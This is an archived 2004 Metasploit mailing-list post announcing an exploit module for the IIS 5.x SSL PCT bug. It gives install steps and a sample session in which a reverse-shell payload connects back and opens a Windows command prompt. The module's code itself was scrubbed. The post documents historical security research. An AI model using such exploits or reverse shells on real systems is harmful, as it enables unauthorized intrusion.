Metasploit mailing list archives
Microsoft IIS SSL PCT Exploit Module
From: hdm at metasploit.com (H D Moore)
Date: Sat, 24 Apr 2004 04:58:51 -0500
Cansecwest is wrapping up, attached is a solid exploit for the SSL PCT bug in IIS 5.0 and 5.1. The 2.1 release will be available sometime during next week and include an improved version of this exploit. To install this module, just copy the attached file into the "exploits" subdirectory of the Framework. For win32 users, the exploits directory can be found in $BASE\home\framework-2.0, where $BASE is the path where you installed the Framework. Cheers, HD and spoonm --[ example ]-- msf iis5x_ssl_pct(winreverse_stg) > exploit [*] Starting Reverse Handler. [*] Attempting to exploit target Windows XP SP1 [*] Sending 329 bytes to remote host. [*] Waiting for a response... [*] Got connection from 192.168.50.98:1038 [*] Sending Stage (115 bytes) Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> -------------- next part -------------- A non-text attachment was scrubbed... Name: iis5x_ssl_pct.pm Type: application/x-perl-module Size: 3053 bytes Desc: not available URL: <http://mail.metasploit.com/pipermail/framework/attachments/20040424/0e65010b/attachment.bin>
Current thread:
- Microsoft IIS SSL PCT Exploit Module H D Moore (Apr 24)